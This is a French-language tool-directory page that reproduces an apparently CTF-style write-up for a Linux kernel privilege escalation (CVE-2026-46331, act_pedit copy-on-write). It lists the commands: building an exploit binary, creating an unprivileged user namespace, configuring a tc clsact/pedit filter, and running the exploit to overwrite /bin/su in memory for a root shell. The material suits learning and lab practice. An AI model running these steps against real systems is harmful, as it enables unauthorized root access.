Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-46331-pedit-cow — Rédaction et étapes d'exploitation pour la vulnérabilité pedit COW (CVE-2026-46331) | Kitploit
Outils/GitHubGitHub/marwahhadi/cve-2026-46331-pedit-cow
Escalade de PrivilègesExploitationCTFApprentissage et ÉducationExploitation de Binaires
GitHubmarwahhadi/cve-2026-46331-pedit-cow

CVE-2026-46331-pedit-cow

Rédaction et étapes d'exploitation pour la vulnérabilité pedit COW (CVE-2026-46331)

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
1il y a 2 moisPas encore vérifié

CVE-2026-46331-pedit-cow

Write-up et étapes d'exploitation pour la vulnérabilité pedit COW (CVE-2026-46331).

Aperçu

Cette démonstration illustre pedit COW, une faille du noyau Linux dans l'action d'édition de paquets du sous-système de contrôle de trafic (act_pedit). La vulnérabilité permet à un utilisateur non privilégié d'écraser une copie en mémoire d'un binaire setuid-root, obtenant ainsi un shell root sans jamais toucher au fichier sur le disque.

Étapes d'exploitation

1. Configuration initiale

L'environnement démarre en tant qu'utilisateur non privilégié (karen).

root@kitploit:~
id
cd ~/packet_edit_meme
make packet_edit_meme
  1. Élévation de privilèges (Création de namespace)

La configuration du contrôle de trafic nécessite normalement les privilèges CAP_NET_ADMIN, qu'un utilisateur ordinaire ne possède pas. J'ai utilisé des espaces de noms utilisateur non privilégiés pour obtenir cette capacité.

root@kitploit:~
unshare -r -n
  1. Configuration de l'action de contrôle de trafic

Dans l'espace de noms, j'ai configuré la qdisc clsact et appliqué un filtre pour déclencher l'action pedit.

Nettoyer toute configuration existante si nécessaire

root@kitploit:~
tc qdisc del dev lo clsact

Configurer la qdisc et le filtre

root@kitploit:~
tc qdisc add dev lo clsact
root@kitploit:~
tc filter add dev lo egress matchall action pedit ex munge ip ttl set 64
  1. Exécution de l'exploit

Après avoir configuré l'environnement, j'ai quitté le shell root et exécuté l'exploit en tant qu'utilisateur non privilégié.

root@kitploit:~
exit
./packet_edit_meme
  1. Résultat final

L'exploit a réussi à écraser l'entrée pour /bin/su, fournissant un shell root interactif.

root@kitploit:~
# cat /root/flag.txt

THM{YOUR_FLAG_HERE}

Télécharger l’outil